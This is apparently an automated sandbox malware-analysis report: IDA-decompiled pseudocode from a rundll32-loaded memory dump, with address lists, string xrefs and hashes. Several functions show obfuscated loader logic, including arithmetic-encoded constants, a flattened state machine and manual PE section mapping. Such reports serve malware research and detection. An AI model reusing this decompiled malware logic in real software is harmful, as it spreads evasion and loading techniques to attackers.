0x1001ef13
0x1001ef1b
0x1001ef23
0x1001ef2b
0x1001ef33
0x1001ef3b
0x1001ef43
0x1001ef4b
0x1001ef53
0x1001ef5b
0x1001ef63
0x1001ef6b
0x1001ef73
0x1001ef7b
0x1001ef83
0x1001ef8b
0x1001ef93
0x1001ef98
0x1001ef9d
0x1001efa5
0x1001efad
0x1001efb2
0x1001efba
0x1001efc4
0x1001efd1
0x1001efd9
0x1001efe1
0x1001efe9
0x1001eff1
0x1001eff9
0x1001f001
0x1001f009
0x1001f011
0x1001f01d
0x1001f020
0x1001f02c
0x1001f030
0x1001f038
0x1001f040
0x1001f048
0x1001f050
0x1001f05c
0x1001f061
0x1001f067
0x1001f06f
0x1001f077
0x1001f07f
0x1001f08b
0x1001f090
0x1001f096
0x1001f09e
0x1001f0a6
0x1001f0ae
0x1001f0b6
0x1001f0be
0x1001f0c6
0x1001f0ce
0x1001f0d3
0x1001f0db
0x1001f0e7
0x1001f0ea
0x1001f0ee
0x1001f0f6
0x1001f0fe
0x1001f0fe
0x1001f110
0x1001f1bb
0x1001f1dd
0x1001f1e2
0x1001f1e5
0x00000000
0x1001f116
0x1001f116
0x1001f118
0x1001f11e
0x1001f123
0x1001f12f
0x1001f13a
0x1001f18d
0x1001f1a9
0x1001f1ae
0x1001f1b1
0x00000000
0x1001f1b1
0x1001f118
0x00000000
0x1001f110
0x1001f1ec
0x1001f1f7
0x1001f1f9
0x1001f1fa
0x1001f1fb
0x1001f1ff
0x1001f20b
0x1001f20d
0x1001f20f
0x1001f216
0x1001f21a
0x1001f21c
0x1001f21f
0x1001f224
0x1001f224
0x1001f224
0x1001f23b

Strings

I, xrefs: 1001EEFB
y\e), xrefs: 1001EDD1
~w, xrefs: 1001F0DB
O^, xrefs: 1001EEBA
2N, xrefs: 1001EDF8
: m<, xrefs: 1001F048
y\e), xrefs: 1001F10A

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 2N$: m<$O^$y\e)$y\e)$~w$I
API String ID: 0-1365918997
Opcode ID: d5dab06448f738ed2d0623d298426914ea100d196ccc3eec11cedf2814d1c34b
Instruction ID: 07705b716052aaf1326add7495473fb9ceb929661d391744f26a35cbcf8e81d5
Opcode Fuzzy Hash: d5dab06448f738ed2d0623d298426914ea100d196ccc3eec11cedf2814d1c34b
Instruction Fuzzy Hash: DBB110B11083819FD3A8CF65C98995BBBE1FBC4748F108A1DF1968A2A0D3B5D949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 1001676B, Relevance: 7.7, Strings: 6, Instructions: 223
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E1001676B(intOrPtr __ecx, intOrPtr* __edx) {
				void* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				intOrPtr _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				unsigned int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _t209;
				intOrPtr* _t214;
				intOrPtr _t220;
				intOrPtr _t221;
				intOrPtr _t222;
				signed int _t225;
				intOrPtr _t227;
				intOrPtr _t228;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				intOrPtr _t254;
				void* _t256;
				signed int _t257;
				intOrPtr _t258;
				intOrPtr _t259;
				signed int* _t260;

				_t222 = __ecx;
				_t260 =  &_v120;
				_v16 = 0x866cc;
				_v24 = __edx;
				asm("stosd");
				_v36 = _v36 & 0x00000000;
				_t256 = 0x32e15263;
				_v40 = __ecx;
				asm("stosd");
				asm("stosd");
				_v88 = 0x4c86;
				_v88 = _v88 >> 8;
				_v88 = _v88 + 0x4743;
				_v88 = _v88 ^ 0x00006c64;
				_v56 = 0x7209;
				_t249 = 0x2f;
				_v56 = _v56 / _t249;
				_v56 = _v56 ^ 0x00004ba4;
				_v104 = 0x1d35;
				_v104 = _v104 ^ 0x1719f2b3;
				_t250 = 0x70;
				_v104 = _v104 / _t250;
				_v104 = _v104 ^ 0x0034fe7c;
				_v108 = 0x850d;
				_t251 = 0x4b;
				_v108 = _v108 / _t251;
				_v108 = _v108 + 0xffff881b;
				_v108 = _v108 ^ 0xffffc0d4;
				_v76 = 0x9106;
				_v76 = _v76 ^ 0x4d359ade;
				_v76 = _v76 ^ 0x4d353ffa;
				_v100 = 0x5c6a;
				_v100 = _v100 + 0xffffc429;
				_t252 = 0x47;
				_v100 = _v100 / _t252;
				_v100 = _v100 ^ 0x000075a2;
				_v120 = 0xfdde;
				_v120 = _v120 + 0xffff2d79;
				_v120 = _v120 << 8;
				_v120 = _v120 + 0x72a3;
				_v120 = _v120 ^ 0x002bcffe;
				_v68 = 0x65b6;
				_v68 = _v68 ^ 0xa03a7dbc;
				_v68 = _v68 ^ 0xa03a0006;
				_v72 = 0x17a;
				_v72 = _v72 | 0xe4ec8cce;
				_v72 = _v72 ^ 0xe4ecfb88;
				_v96 = 0x4e8;
				_v96 = _v96 + 0x12c;
				_v96 = _v96 * 0x46;
				_v96 = _v96 ^ 0x00018935;
				_v60 = 0xff48;
				_v60 = _v60 | 0x2f82106f;
				_v60 = _v60 ^ 0x2f82b48b;
				_v64 = 0xb5da;
				_v64 = _v64 ^ 0xd090b991;
				_v64 = _v64 ^ 0xd0906a5c;
				_v116 = 0xf7aa;
				_v116 = _v116 >> 0xb;
				_v116 = _v116 + 0x5870;
				_v116 = _v116 << 4;
				_v116 = _v116 ^ 0x000599f3;
				_v92 = 0xc80a;
				_t253 = 0x33;
				_t259 = _v24;
				_t221 = _v24;
				_v92 = _v92 * 0x56;
				_v92 = _v92 + 0x14d;
				_v92 = _v92 ^ 0x004333b4;
				_v112 = 0x930e;
				_v112 = _v112 >> 0xe;
				_t254 = _v20;
				_v112 = _v112 / _t253;
				_v112 = _v112 * 0x2c;
				_v112 = _v112 ^ 0x00000167;
				_v48 = 0x7ef;
				_v48 = _v48 + 0x7f73;
				_v48 = _v48 ^ 0x00009a09;
				_v84 = 0x8c86;
				_v84 = _v84 * 0x14;
				_v84 = _v84 * 0x18;
				_v84 = _v84 ^ 0x01070a49;
				_v52 = 0xdc0;
				_v52 = _v52 | 0x8738231d;
				_v52 = _v52 ^ 0x873814a6;
				_v44 = 0xb7c7;
				_v44 = _v44 | 0xf6a52020;
				_v44 = _v44 ^ 0xf6a5b7e7;
				L1:
				while(1) {
					do {
						while(_t256 != 0x43b6c7f) {
							if(_t256 == 0x2e16d409) {
								_t225 = E1001CD07(_t222, _v104, _v108, _t209,  &_v32, _v76, _t259);
								_t260 =  &(_t260[5]);
								_v36 = _t225;
								if(_t225 == 0) {
									_t257 = _v36;
									L20:
									E100091CD(_v112, _v48, _v84, _t221, _v52);
								} else {
									_t227 = _v32;
									if(_t227 == 0) {
										goto L16;
									} else {
										_v80 = _v80 + _t227;
										_t259 = _t259 - _t227;
										if(_t259 != 0) {
											L10:
											_t209 = _v80;
											L11:
											_t222 = _v40;
											_t256 = 0x2e16d409;
											continue;
										} else {
											_t228 = _t254 + _t254;
											_push(_t228);
											_v28 = _t228;
											_t258 = E100157E8(_t228);
											if(_t258 == 0) {
												goto L16;
											} else {
												E10009970(_v68, _t221, _v72, _t258, _t254, _v96);
												E100091CD(_v60, _v64, _v116, _t221, _v92);
												_t259 = _t254;
												_t220 = _t258 + _t254;
												_t254 = _v28;
												_t260 =  &(_t260[7]);
												_v80 = _t220;
												_t221 = _t258;
												if(_t259 == 0) {
													goto L16;
												} else {
													goto L10;
												}
											}
										}
									}
								}
							} else {
								if(_t256 != 0x32e15263) {
									goto L15;
								} else {
									_t256 = 0x43b6c7f;
									continue;
								}
							}
							L18:
							return _t257;
						}
						_t254 = 0x10000;
						_push(_t222);
						_t209 = E100157E8(0x10000);
						_t221 = _t209;
						if(_t221 == 0) {
							_t222 = _v40;
							_t256 = 0x166bd62c;
							goto L15;
						} else {
							_v80 = _t209;
							_t259 = 0x10000;
							goto L11;
						}
						goto L18;
						L15:
						_t209 = _v80;
					} while (_t256 != 0x166bd62c);
					L16:
					_t257 = _v36;
					if(_t257 == 0) {
						goto L20;
					} else {
						_t214 = _v24;
						 *_t214 = _t221;
						 *((intOrPtr*)(_t214 + 4)) = _t254 - _t259;
					}
					goto L18;
				}
			}

0x1001676b
0x1001676b
0x1001676e
0x10016780
0x10016784
0x10016789
0x1001678e
0x10016793
0x10016797
0x10016798
0x10016799
0x100167a1
0x100167a6
0x100167ae
0x100167b6
0x100167c2
0x100167c7
0x100167cd
0x100167d5
0x100167dd
0x100167e9
0x100167ee
0x100167f4
0x100167fc
0x10016808
0x1001680d
0x10016813
0x1001681b
0x10016823
0x1001682b
0x10016833
0x1001683b
0x10016843
0x1001684f
0x10016852
0x10016856
0x1001685e
0x10016866
0x1001686e
0x10016873
0x1001687b
0x10016883
0x1001688b
0x10016893
0x1001689b
0x100168a3
0x100168ab
0x100168b3
0x100168bb
0x100168c8
0x100168cc
0x100168d4
0x100168dc
0x100168e4
0x100168ec
0x100168f4
0x100168fc
0x10016904
0x1001690c
0x10016911
0x10016919
0x10016920
0x10016928
0x10016937
0x10016938
0x1001693c
0x10016940
0x10016944
0x1001694c
0x10016954
0x1001695c
0x10016967
0x1001696b
0x10016974
0x10016978
0x10016980
0x10016988
0x10016990
0x10016998
0x100169a5
0x100169ae
0x100169b2
0x100169be
0x100169c6
0x100169ce
0x100169d6
0x100169de
0x100169e6
0x00000000
0x100169ee
0x100169ee
0x100169ee
0x10016a00
0x10016a2d
0x10016a2f
0x10016a32
0x10016a38
0x10016b22
0x10016b26
0x10016b37
0x10016a3e
0x10016a3e
0x10016a44
0x00000000
0x10016a4a
0x10016a4a
0x10016a4e
0x10016a50
0x10016ab6
0x10016ab6
0x10016aba
0x10016aba
0x10016abe
0x00000000
0x10016a52
0x10016a56
0x10016a5d
0x10016a5e
0x10016a67
0x10016a6c
0x00000000
0x10016a72
0x10016a82
0x10016a98
0x10016a9d
0x10016a9f
0x10016aa2
0x10016aa9
0x10016aac
0x10016ab0
0x10016ab4
0x00000000
0x00000000
0x00000000
0x00000000
0x10016ab4
0x10016a6c
0x10016a50
0x10016a44
0x10016a02
0x10016a08
0x00000000
0x10016a0e
0x10016a0e
0x00000000
0x10016a0e
0x10016a08
0x10016b19
0x10016b21
0x10016b21
0x10016acc
0x10016ad5
0x10016ad8
0x10016add
0x10016ae2
0x10016aec
0x10016af0
0x00000000
0x10016ae4
0x10016ae4
0x10016ae8
0x00000000
0x10016ae8
0x00000000
0x10016af5
0x10016af5
0x10016af9
0x10016b05
0x10016b05
0x10016b0b
0x00000000
0x10016b0d
0x10016b0d
0x10016b13
0x10016b15
0x10016b15
0x00000000
0x10016b0b

Strings

dl, xrefs: 100167AE
pX, xrefs: 10016911
cR2, xrefs: 1001678E
cR2, xrefs: 10016A02
r, xrefs: 100167B6
j\, xrefs: 1001683B

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: r$cR2$cR2$dl$j\$pX
API String ID: 0-1990883307
Opcode ID: 5afea401a38fb3ed9ab9e3cfea92ea9d8ff477060cd6098b2c0c0ba7b7ad2f6f
Instruction ID: abaabab29ae1ed465508f17d184fa830ec2d5e61d89a70c706a4c59ec083da4e
Opcode Fuzzy Hash: 5afea401a38fb3ed9ab9e3cfea92ea9d8ff477060cd6098b2c0c0ba7b7ad2f6f
Instruction Fuzzy Hash: 49A130B19093819BD354CF25C98580BFBE1FBC8798F108A2DF5959A260C3B5DA49CF83

Uniqueness

Uniqueness Score: -1.00%

Function 10005BE1, Relevance: 7.7, Strings: 6, Instructions: 172
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E10005BE1(void* __ecx, intOrPtr* __edx, void* __eflags, intOrPtr _a8) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				void* _t161;
				void* _t180;
				void* _t190;
				void* _t192;
				signed int _t194;
				signed int _t195;
				signed int _t196;
				signed int _t197;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				void* _t227;
				void* _t232;
				intOrPtr* _t234;
				signed int* _t236;
				signed int* _t237;
				signed int* _t238;

				_push(_a8);
				_t234 = __edx;
				_push(0);
				_push(__edx);
				_push(__ecx);
				E100056B2(_t161);
				_v16 = 0x1b4e;
				_v16 = _v16 ^ 0xc2117ce7;
				_v16 = _v16 ^ 0xc21177a9;
				_v20 = 0x4ee4;
				_t194 = 0x69;
				_v20 = _v20 / _t194;
				_v20 = _v20 ^ 0x000020c0;
				_v28 = 0x719b;
				_v28 = _v28 + 0x9810;
				_v28 = _v28 ^ 0x00016243;
				_v36 = 0xcf79;
				_v36 = _v36 << 4;
				_v36 = _v36 + 0x818a;
				_v36 = _v36 ^ 0x000d705e;
				_v40 = 0x5a4d;
				_v40 = _v40 + 0x4c3f;
				_t195 = 0x28;
				_v40 = _v40 * 0x4c;
				_v40 = _v40 ^ 0x0031666b;
				_v64 = 0x8d9a;
				_v64 = _v64 / _t195;
				_t196 = 0x5f;
				_v64 = _v64 / _t196;
				_t197 = 0x63;
				_v64 = _v64 * 0x23;
				_v64 = _v64 ^ 0x000027a7;
				_v12 = 0x746d;
				_v12 = _v12 / _t197;
				_v12 = _v12 ^ 0x00006093;
				_v60 = 0x2db8;
				_v60 = _v60 | 0xa376fc52;
				_v60 = _v60 >> 8;
				_v60 = _v60 ^ 0x00a31548;
				_v24 = 0xbe89;
				_v24 = _v24 + 0xfffffabc;
				_v24 = _v24 ^ 0x0000f7c2;
				_v48 = 0x7924;
				_v48 = _v48 + 0x8930;
				_t198 = 0x7b;
				_v48 = _v48 * 0x60;
				_v48 = _v48 << 0xb;
				_v48 = _v48 ^ 0x06fc5745;
				_v52 = 0x6da;
				_v52 = _v52 / _t198;
				_v52 = _v52 >> 2;
				_v52 = _v52 + 0xffffc306;
				_v52 = _v52 ^ 0xffffa7a2;
				_v32 = 0xa776;
				_v32 = _v32 << 0xb;
				_v32 = _v32 ^ 0x9264e448;
				_v32 = _v32 ^ 0x975f0f13;
				_v4 = 0x5f13;
				_v4 = _v4 >> 2;
				_v4 = _v4 ^ 0x00006c09;
				_v8 = 0xd9b4;
				_t199 = 0x7d;
				_v8 = _v8 / _t199;
				_v8 = _v8 ^ 0x00001d23;
				_v44 = 0xe400;
				_v44 = _v44 | 0xbfff2ffd;
				_t200 = 3;
				_v44 = _v44 / _t200;
				_v44 = _v44 ^ 0x3fffd239;
				_v56 = 0xf54;
				_v56 = _v56 + 0xffffced3;
				_v56 = _v56 + 0x8d94;
				_v56 = _v56 ^ 0xc5d6359f;
				_v56 = _v56 ^ 0xc5d65e64;
				_t180 = E100073F9(_v28, _v36, _v40, _v64, __edx);
				_t190 = _t180;
				_t236 =  &(( &_v64)[7]);
				if(_t190 != 0) {
					_t227 = E1000204B(_v56, _v12,  *((intOrPtr*)(_t190 + 0x50)), _v20 | _v16, _v60, _v24);
					_t237 =  &(_t236[5]);
					if(_t227 == 0) {
						L6:
						return _t227;
					}
					E10009970(_v48,  *_t234, _v52, _t227,  *((intOrPtr*)(_t190 + 0x54)), _v32);
					_t238 =  &(_t237[4]);
					_t232 = ( *(_t190 + 0x14) & 0x0000ffff) + 0x18 + _t190;
					_t192 = ( *(_t190 + 6) & 0x0000ffff) * 0x28 + _t232;
					while(_t232 < _t192) {
						_t188 =  <  ?  *((void*)(_t232 + 8)) :  *((intOrPtr*)(_t232 + 0x10));
						E10009970(_v4,  *((intOrPtr*)(_t232 + 0x14)) +  *_t234, _v8,  *((intOrPtr*)(_t232 + 0xc)) + _t227,  <  ?  *((void*)(_t232 + 8)) :  *((intOrPtr*)(_t232 + 0x10)), _v44);
						_t238 =  &(_t238[4]);
						_t232 = _t232 + 0x28;
					}
					goto L6;
				}
				return _t180;
			}

0x10005be6
0x10005bea
0x10005bec
0x10005bee
0x10005bef
0x10005bf0
0x10005bf5
0x10005bff
0x10005c07
0x10005c0f
0x10005c1d
0x10005c22
0x10005c28
0x10005c30
0x10005c38
0x10005c40
0x10005c48
0x10005c50
0x10005c55
0x10005c5d
0x10005c65
0x10005c6d
0x10005c7a
0x10005c7d
0x10005c81
0x10005c89
0x10005c99
0x10005ca1
0x10005ca6
0x10005cb1
0x10005cb4
0x10005cb8
0x10005cc0
0x10005cd0
0x10005cd4
0x10005cdc
0x10005ce4
0x10005cec
0x10005cf1
0x10005cf9
0x10005d01
0x10005d09
0x10005d11
0x10005d19
0x10005d26
0x10005d27
0x10005d2b
0x10005d30
0x10005d38
0x10005d46
0x10005d4a
0x10005d4f
0x10005d57
0x10005d5f
0x10005d67
0x10005d6c
0x10005d74
0x10005d7e
0x10005d86
0x10005d8b
0x10005d93
0x10005da1
0x10005da6
0x10005dac
0x10005db4
0x10005dbc
0x10005dc8
0x10005dcc
0x10005dd0
0x10005dd8
0x10005de0
0x10005de8
0x10005df0
0x10005df8
0x10005e10
0x10005e15
0x10005e17
0x10005e1c
0x10005e44
0x10005e46
0x10005e4b
0x10005eb0
0x00000000
0x10005eb2
0x10005e61
0x10005e6a
0x10005e74
0x10005e79
0x10005eab
0x10005e92
0x10005ea0
0x10005ea5
0x10005ea8
0x10005ea8
0x00000000
0x10005eaf
0x10005eb8

Strings

l, xrefs: 10005D8B
kf1, xrefs: 10005C81
N, xrefs: 10005C0F
mt, xrefs: 10005CC0
^p, xrefs: 10005C5D
$y, xrefs: 10005D11

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: l$$y$^p$kf1$mt$N
API String ID: 0-2826323611
Opcode ID: 990bd43fce18d13703470070e4ea28ead3db5627c1d4020e323a10ed1f143b64
Instruction ID: b087b2a7bdd9e8b1e5a607b88e6e493accb252ae43d71ee7b54195949d735030
Opcode Fuzzy Hash: 990bd43fce18d13703470070e4ea28ead3db5627c1d4020e323a10ed1f143b64
Instruction Fuzzy Hash: 947124715093409BE358CF65C98991BFBF2FBC4758F008A1DF589862A0D7B6D945CF42

Uniqueness

Uniqueness Score: -1.00%

Function 10005856, Relevance: 7.7, Strings: 6, Instructions: 168
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E10005856(void* __ecx, void* __edi, void* __eflags) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				unsigned int _v56;
				signed int _v60;
				signed int _v64;
				signed int _t207;
				signed int _t209;
				int _t213;
				void* _t216;
				signed int _t217;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t222;
				signed int _t223;
				signed int _t224;
				signed int _t225;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t233;
				void* _t262;
				void* _t266;
				signed int _t268;

				_v20 = 0xe5e9;
				_v20 = _v20 >> 1;
				_v20 = _v20 ^ 0x000072fc;
				_v60 = 0xeee;
				_t266 = __ecx;
				_t219 = 0xb;
				_v60 = _v60 / _t219;
				_t220 = 0x2d;
				_v60 = _v60 / _t220;
				_v60 = _v60 << 0xa;
				_v60 = _v60 ^ 0x00001c10;
				_v36 = 0x52f6;
				_v36 = _v36 ^ 0x4f1b66f5;
				_t221 = 0x42;
				_v36 = _v36 * 0x69;
				_v36 = _v36 ^ 0x72285533;
				_v12 = 0x9a21;
				_v12 = _v12 | 0x390e9e30;
				_v12 = _v12 ^ 0x390e9e21;
				_v64 = 0x3c55;
				_v64 = _v64 / _t221;
				_v64 = _v64 + 0xffff9cac;
				_v64 = _v64 << 2;
				_v64 = _v64 ^ 0xfffe1a99;
				_v44 = 0xe171;
				_v44 = _v44 | 0xc7bc5698;
				_t222 = 0x66;
				_v44 = _v44 / _t222;
				_v44 = _v44 ^ 0x01f52ba1;
				_v40 = 0x30e3;
				_v40 = _v40 ^ 0xbd01c268;
				_v40 = _v40 ^ 0x5fce1aa6;
				_v40 = _v40 ^ 0xe2cffd7a;
				_v24 = 0x83cc;
				_t223 = 0x5f;
				_v24 = _v24 / _t223;
				_v24 = _v24 ^ 0x00004c9a;
				_v56 = 0x8dff;
				_t224 = 0x7e;
				_v56 = _v56 / _t224;
				_v56 = _v56 | 0x1e081a33;
				_v56 = _v56 >> 0xa;
				_v56 = _v56 ^ 0x0007b8c6;
				_v16 = 0x76f3;
				_t225 = 0x52;
				_v16 = _v16 / _t225;
				_v16 = _v16 ^ 0x00007e48;
				_v48 = 0xd814;
				_t226 = 0x1a;
				_v48 = _v48 / _t226;
				_v48 = _v48 >> 5;
				_v48 = _v48 | 0x7e8c2f48;
				_v48 = _v48 ^ 0x7e8c1b4f;
				_v28 = 0x13ee;
				_t227 = 0x75;
				_v28 = _v28 / _t227;
				_v28 = _v28 + 0xffff1a4e;
				_v28 = _v28 ^ 0xffff6e25;
				_v8 = 0x2381;
				_v8 = _v8 + 0xffff7415;
				_v8 = _v8 ^ 0xffffaad1;
				_v32 = 0x9c03;
				_t228 = 0x2a;
				_v32 = _v32 / _t228;
				_v32 = _v32 >> 4;
				_v32 = _v32 ^ 0x00002dee;
				_v52 = 0xdc3f;
				_v52 = _v52 >> 0xb;
				_v52 = _v52 ^ 0xda865163;
				_v52 = _v52 * 0x7a;
				_v52 = _v52 ^ 0x2402d330;
				_v4 = E10017B6B();
				_t216 = _v20 + E10017B6B() % _v60;
				_t207 = E10017B6B();
				_t209 = _v52;
				_t268 = _v36 + _t207 % _v12;
				if(_t209 < _t216) {
					_t217 = _t216 - _t209;
					_t262 = _t266;
					_t233 = _t217 >> 1;
					_t213 = memset(_t262, 0x2d002d, _t233 << 2);
					asm("adc ecx, ecx");
					_t266 = _t266 + _t217 * 2;
					memset(_t262 + _t233, _t213, 0);
				}
				E100060DA( &_v4, _v48, 3, _t268, _v28, _v8, _v32, _t266);
				 *((short*)(_t266 + _t268 * 2)) = 0;
				return 0;
			}

0x10005859
0x10005863
0x10005867
0x1000586f
0x10005880
0x10005882
0x10005887
0x10005891
0x10005896
0x1000589c
0x100058a1
0x100058a9
0x100058b1
0x100058be
0x100058c1
0x100058c5
0x100058cd
0x100058d5
0x100058dd
0x100058e5
0x100058f5
0x100058f9
0x10005901
0x10005906
0x1000590e
0x10005916
0x10005922
0x10005927
0x1000592d
0x10005935
0x1000593d
0x10005945
0x1000594d
0x10005955
0x10005961
0x10005966
0x1000596c
0x10005974
0x10005980
0x10005985
0x1000598b
0x10005993
0x10005998
0x100059a0
0x100059ac
0x100059af
0x100059b3
0x100059bb
0x100059cb
0x100059d0
0x100059d6
0x100059db
0x100059e3
0x100059eb
0x100059f7
0x100059fc
0x10005a02
0x10005a0a
0x10005a12
0x10005a1a
0x10005a22
0x10005a2a
0x10005a36
0x10005a39
0x10005a3d
0x10005a42
0x10005a4a
0x10005a52
0x10005a57
0x10005a64
0x10005a68
0x10005a7d
0x10005a9e
0x10005aa4
0x10005ab5
0x10005ab9
0x10005abd
0x10005abf
0x10005ac9
0x10005acb
0x10005acd
0x10005acf
0x10005ad1
0x10005ad4
0x10005ad7
0x10005af0
0x10005afa
0x10005b04

Strings

U<, xrefs: 100058E5
3U(r, xrefs: 100058C5
q, xrefs: 1000590E
-, xrefs: 10005A42
H~, xrefs: 100059B3
0, xrefs: 10005935

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 3U(r$H~$U<$q$-$0
API String ID: 0-112106996
Opcode ID: a14db494ac1d1924fb546390b44814837310fb5a009353283d47587c83f43a78
Instruction ID: f4907ee1585d44d3942ec58e3a4e8cb82ff1253e3bf876b76615309baba7f8ab
Opcode Fuzzy Hash: a14db494ac1d1924fb546390b44814837310fb5a009353283d47587c83f43a78
Instruction Fuzzy Hash: 037134716083419FE348CF25D88A50BBBF2FBC8748F10891DF1999A2A0D7B5DA598F46

Uniqueness

Uniqueness Score: -1.00%

Function 10004BDE, Relevance: 7.7, Strings: 6, Instructions: 158
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E10004BDE(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				void* _t127;
				intOrPtr _t142;
				void* _t145;
				void* _t148;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				signed int _t167;
				void* _t169;
				signed int* _t172;

				_push(_a20);
				_push(1);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(1);
				E100056B2(_t127);
				_v24 = 0x41a5;
				_t172 =  &(( &_v60)[7]);
				_v24 = _v24 + 0x21bb;
				_v24 = _v24 ^ 0x00007358;
				_t169 = 0;
				_v28 = 0x71a;
				_t148 = 0xfead4ff;
				_t164 = 0x12;
				_v28 = _v28 * 0x28;
				_v28 = _v28 ^ 0x00016495;
				_v32 = 0xbf26;
				_v32 = _v32 + 0xffff8b18;
				_v32 = _v32 ^ 0x000031b7;
				_v36 = 0x25da;
				_v36 = _v36 ^ 0x27b288f9;
				_v36 = _v36 ^ 0x27b2aeec;
				_v56 = 0xc86;
				_v56 = _v56 * 0x14;
				_v56 = _v56 / _t164;
				_v56 = _v56 | 0x1dd3be64;
				_v56 = _v56 ^ 0x1dd38503;
				_v52 = 0xa82;
				_t165 = 0x49;
				_v52 = _v52 / _t165;
				_v52 = _v52 + 0x548f;
				_v52 = _v52 ^ 0x000056ef;
				_v60 = 0x147a;
				_v60 = _v60 + 0xffff5465;
				_v60 = _v60 + 0x4912;
				_v60 = _v60 + 0x75b6;
				_v60 = _v60 ^ 0x00000d5b;
				_v12 = 0x2808;
				_t166 = 0x3c;
				_v12 = _v12 / _t166;
				_v12 = _v12 ^ 0x00007e81;
				_v16 = 0x677c;
				_v16 = _v16 >> 0xf;
				_v16 = _v16 ^ 0x00000f03;
				_v20 = 0x40ea;
				_t73 =  &_v20; // 0x40ea
				_t167 = 7;
				_v20 =  *_t73 / _t167;
				_v20 = _v20 ^ 0x0000696b;
				_v8 = 0x2aca;
				_v8 = _v8 ^ 0x5bcab796;
				_v8 = _v8 ^ 0x5bca9ee4;
				_v40 = 0x8019;
				_v40 = _v40 >> 1;
				_v40 = _v40 << 9;
				_v40 = _v40 ^ 0x00802c80;
				_v44 = 0xa509;
				_v44 = _v44 | 0xfb24deb0;
				_v44 = _v44 << 0xa;
				_v44 = _v44 ^ 0x93fe8f44;
				_v48 = 0x64c2;
				_v48 = _v48 + 0xffffc005;
				_v48 = _v48 | 0x8cdd04ab;
				_v48 = _v48 ^ 0x8cdd37a9;
				_t168 = _v4;
				while(_t148 != 0x109ed35) {
					if(_t148 == 0xfead4ff) {
						_t148 = 0x2ad569f8;
						continue;
					} else {
						if(_t148 == 0x1649e19d) {
							_t114 =  &_v20; // 0x40ea
							E10017A72(_a20, _v56, 1, 1, _v52, _v60, _v12, _t148, _a8, _v16,  *_t114, _v4);
							_t172 =  &(_t172[0xa]);
							_t148 = 0x109ed35;
							_t169 =  !=  ? 1 : _t169;
							continue;
						} else {
							if(_t148 == 0x2ad569f8) {
								_t142 = E10014DBD();
								_t168 = _t142;
								if(_t142 != 0xffffffff) {
									_t148 = 0x2e3949fa;
									continue;
								}
							} else {
								if(_t148 != 0x2e3949fa) {
									L13:
									if(_t148 != 0x14320148) {
										continue;
									}
								} else {
									_t111 =  &_v28; // 0x40ea
									_t145 = E1001D472(_t168,  *_t111, _v32, _v36,  &_v4);
									_t172 =  &(_t172[3]);
									if(_t145 != 0) {
										_t148 = 0x1649e19d;
										continue;
									}
								}
							}
						}
					}
					return _t169;
				}
				E100078F0(_v4, _v8, _v40, _v44, _v48);
				_t172 =  &(_t172[3]);
				_t148 = 0x14320148;
				goto L13;
			}

0x10004be5
0x10004bec
0x10004bed
0x10004bf1
